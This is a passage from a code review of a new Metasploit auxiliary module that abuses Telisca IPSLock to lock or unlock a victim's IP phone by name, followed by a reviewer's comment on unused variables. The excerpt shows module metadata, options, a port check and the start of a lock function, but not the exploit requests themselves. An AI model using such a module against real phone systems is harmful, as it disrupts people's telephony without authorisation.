modules/auxiliary/voip/telisca_ips_lock_abuse.rb

```diff
@@ -0,0 +1,167 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  #include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Telisca IPSLock Abuse',
+      'Description'    => %q{This modules will exploit the vulnerabilities of Telisca IPSLock , in order to lock/unlock IP Phones.  you need to be in the voip vlan and you have to  know the phone name example : SEP002497AB1D4B .  Set ACTION to either LOCK or UNLOCK UNLOCK is the default.},
+      'References'     =>
+        [
+        ],
+      'Author'         =>
+        [
+          'Fakhir Karim Reda <karim.fakhir[at]gmail.com>',
+          'zirsalem'
+        ],
+       'DefaultOptions' =>
+        {
+          'SSL' => false,
+          'SSLVersion' => 'TLS1',
+          'RPORT' => 80
+        },
+       'License'        => MSF_LICENSE,
+       'DisclosureDate' => "Dec 17 2015",
+      'Actions'     =>
+        [
+          ['LOCK'],
+          ['UNLOCK']
+        ],
+    ))
+    register_options(
+      [
+        OptInt.new('TIMEOUT', [true, 'HTTP/HTTPS connect/read timeout in seconds', 1]),
+        Opt::RPORT(80),
+        OptString.new('PHONENAME', [true, 'The name of the victim phone ex SEP002497AB1D4B ']),
+        OptString.new('RHOST', [true, 'The IPSLock IP Address']),
+        OptString.new('ACTION', [true, 'LOCK OR UNLOCK','LOCK']),
+      ], self.class)
+    deregister_options('RHOSTS')
+  end
+
+  def port_open?
+    begin
+      res = send_request_raw({'method' => 'GET', 'uri' => '/'}, datastore['TIMEOUT'])
+      return true if res
+    rescue ::Rex::ConnectionRefused
+      vprint_status("#{peer} - Connection refused")
+      return false
+    rescue ::Rex::ConnectionError
+      vprint_error("#{peer} - Connection failed")
+      return false
+    rescue ::OpenSSL::SSL::SSLError
+      vprint_error("#{peer} - SSL/TLS connection error")
+      return false
+    end
+  end
+
+  #
+  # Lock a phone .  Function returns true or false
+  #
+  def lock(phone_name,ips_ip)
+    sid = ''
+    extension = ''
+    user_name = ''
+    lock_url = ''
```

Comment:
Apart from sid, all other variables are not used any where. Why do we need to initialize them?